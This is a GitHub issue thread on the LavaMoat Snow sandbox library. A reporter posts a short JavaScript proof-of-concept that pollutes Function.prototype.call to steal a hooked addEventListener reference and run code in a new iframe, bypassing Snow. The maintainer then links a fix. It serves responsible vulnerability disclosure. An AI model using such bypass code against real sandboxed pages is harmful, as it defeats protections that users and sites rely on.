Bypass with Function.prototype.call pollution

LavaMoat / snow

Use Snow to finally secure your web app's same origin realms!

https://lavamoat.github.io/snow/demo/

MIT License

100 stars 9 forks source link

Bypass with Function.prototype.call pollution #114

Closed mmndaniel closed 1 year ago

mmndaniel commented 1 year ago

var _call = Function.prototype.call;
Function.prototype.call = function() {
    var args = Array.from(arguments);
    if (args[2].toString().includes('hook')) {
        _addEventListener = this; // steal ref
        return;
    }
    return _call.apply(this, args);
};
var f = document.createElement('iframe');
document.body.appendChild(f);
var f2 = document.createElement('iframe');
_addEventListener.apply(f2, ['load', function() {
    this.contentWindow.alert(1);
}]);
document.body.appendChild(f2);

weizman commented 1 year ago

Amazing as usual! EventTarget is the only native I was not able to bring from a detached iframe, because https://github.com/LavaMoat/snow/issues/61 so nice catch! Thoughts on a simple fix? https://github.com/LavaMoat/snow/pull/115

mmndaniel commented 1 year ago

LGTM!